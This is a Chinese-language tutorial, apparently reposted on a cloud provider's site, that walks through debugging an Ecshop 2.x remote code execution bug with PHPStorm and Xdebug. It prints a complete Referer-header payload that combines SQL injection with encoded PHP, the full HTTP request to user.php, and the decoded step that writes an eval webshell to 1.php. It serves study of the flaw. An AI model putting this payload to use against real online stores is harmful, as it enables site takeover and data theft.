如何進行Ecshop2.x代碼執行漏洞動態調試分析

如何進行Ecshop2.x代碼執行漏洞動態調試分析，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

一、背景介紹

號稱國內最大的開源網店系統，可以直接遠程寫入webshell。

本文會通過動態分析來解析漏洞每個細節，關于漏洞原理可以看漏洞原理，講的很詳細，本文重點介紹動態分析審計的技巧和如何調試漏洞，關于漏洞本身也是一個很值得學習的漏洞，能構造出這個攻擊鏈是需要對每個細節都有深刻的認識才能實現的。

二、動態調試環境搭建

自行下載安裝phpstudy和phpstorm

首先確定php版本

然后修改配置文件    

修改php.ini中如下

[XDebug]

xdebug.profiler_append = 0xdebug.profiler_enable = 1xdebug.profiler_enable_trigger = 0xdebug.profiler_output_dir ="C:\phpStudy\tmp\xdebug"xdebug.trace_output_dir ="C:\phpStudy\tmp\xdebug"xdebug.profiler_output_name = "cache.out.%t-%s"xdebug.remote_enable = 1xdebug.remote_handler = "dbgp"xdebug.remote_host = "127.0.0.1"zend_extension="C:\phpStudy\php53\ext\xdebug.dll"xdebug.remote_port=9000xdebug.idekey= PHPSTROM

設置php版本，一定要對應上

下面圖片是默認的不用動

下面的修改key和端口如下

在這里配置根目錄調試環境    

這里就留一個Chrome瀏覽器

Chrome瀏覽器要安裝插件JetBrains IDE Support 下載安裝好了不用修改配置，這樣就基本可以了。 

三、漏洞動態調試分析

下面進行動態分析，動態分析的好處就是漏洞分析起來更加清晰。

下斷點這里我們斷到了漏洞起始點方便分析每一個細節，然后點擊debug，

然后瀏覽器會打開

然后點擊登錄，會觸發斷點，可以看到停到了斷點處

下面介紹使用的一些快捷鍵：

f7會跟進函數 ，

f8 步出也就是一行一行走，不進入函數，有些循環或者不想看的函數直接f8，

進入函數后想跳出去就用shift+f8

Ctrl+art加 點擊想要看的函數就會進入

Alt +f7 會搜索誰調用了這個函數或者變量

筆者常用的就這些，掌握這些技能后就可以調試

這里HTTP_REFFER可控到賦值到$back_act

我們先用burp抓包測試下漏洞 ，先分析下payload

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}

554fcae493e564ee0dc75bdf2ebf94caads 這串可以分解成兩塊，一個是554fcae493e564ee0dc75bdf2ebf94ca，一個是ads，ads是控制函數流程進入到insert_ads函數，554fcae493e564ee0dc75bdf2ebf94ca前面的這個就是個hash，后面會對它判斷，判斷后會把它去掉，沒有它是進入不了攻擊鏈的，后面再動態分析過程會介紹到。

后面的編碼部分解開是這樣

{$asd'];assert(base64_decode('file_put_contents('1.php','<?php eval($_POST[1337]); ?>')'));//}xxx

發包

GET /upload/user.php?act=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS[visit_times]=1Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10--    -";s:2:"id";s:3:"'/*";}Connection: closeUpgrade-Insecure-Requests: 1

可以看的成功寫入webshell

然后我們繼續調試，我們先一路f8走到這里，然后再f7進入看看

這里的關鍵點是insert_mod,動態調用，因為我們沒辦法抓包發送payload測試，所以這里面我們需要自己修改參數讓流程按照payload攻擊鏈來執行，攻擊鏈中需要執行insert_ads,下面的有個hash判斷

下面的可以看到有這個hash，所以這里不需要控制，然后繼續流程

下面圖片中會把hash去掉然后剩下$k,$k中的1，3,5,7都可以控制，所以這里我們在1修改它的值為我們的payload，右鍵點擊setvalue

把這payload重新復制，右鍵setValue，這里直接復制會報錯，還是一點點修改吧，然后雙引號要轉義

ads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}

繼續f7進入到insert_mod里面，然后發現，insert_ads函數已經控制了，但是payload被反序列化時候$para為false，說明我們的payload有問題，點擊debug重新來。

換了個位置修改，在反序列化函數之前修改，下面圖片可以看到$para有值了，是我們的payload

繼續走來到了insert_ads，一路f8，讓我們的payload代入進了變量num

最后拼接成了這樣

繼續往下走，一路f8來到這里

然后f7進入看看，會把payload代入_eval代碼執行函數，在這里payload還會被fetch_str處理，f7進入看看    

F8來到這里，在這里之前source都沒有變化，經過了preg_replace會處理掉{    

payload變成$asd’;]assertxxx 代入到了select里

這個select函數跟入不進去，只能靜態分析下了，可以這樣尋找ctrl+shift+f

在select中進入了get_val,substr去掉了$

Payload變成了：asd’;]assertXXX

進入到了make_var

最后拼接到了

最終payload變成

$this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//']

最后來到eval    

這里再走一下就把shell寫進去了

看完上述內容是否對您有幫助呢？如果還想對相關知識有進一步的了解或閱讀更多相關文章，請關注億速云行業資訊頻道，感謝您對億速云的支持。